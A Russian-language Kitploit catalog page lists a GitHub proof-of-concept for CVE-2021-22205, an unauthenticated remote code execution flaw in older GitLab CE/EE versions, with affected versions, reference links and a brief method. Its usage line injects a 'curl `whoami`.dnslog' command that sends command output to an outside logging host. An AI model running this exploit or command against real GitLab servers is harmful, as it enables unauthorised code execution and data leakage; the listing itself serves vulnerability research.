Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22205 — CVE-2021-22205 Несанкционированный RCE | Kitploit
Инструменты/GitHubGitHub/r0exper/cve-2021-22205
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubr0exper/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 Несанкционированный RCE

Репозиторий
69274 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22205

Затронутые версии:

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

Использование

root@kitploit:~
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Xnip2021-10-28_21-54-04

Получение csrf-token:

Xnip2021-10-28_21-44-31

Через /users/sign_in получаем csrf-token, затем с помощью предыдущего CVE-2021-22205 poc формируем пакет для загрузки и выполняем неаутентифицированный запрос на загрузку, в итоге получаем rce.

Xnip2021-10-28_21-43-13

Ссылки:

  • https://hackerone.com/reports/1154542
  • https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
  • https://forum.ywhack.com/viewthread.php?tid=115611
  • https://forum.ywhack.com/viewthread.php?tid=116706
  • https://github.com/RedTeamWing/CVE-2021-22205
Скачать инструмент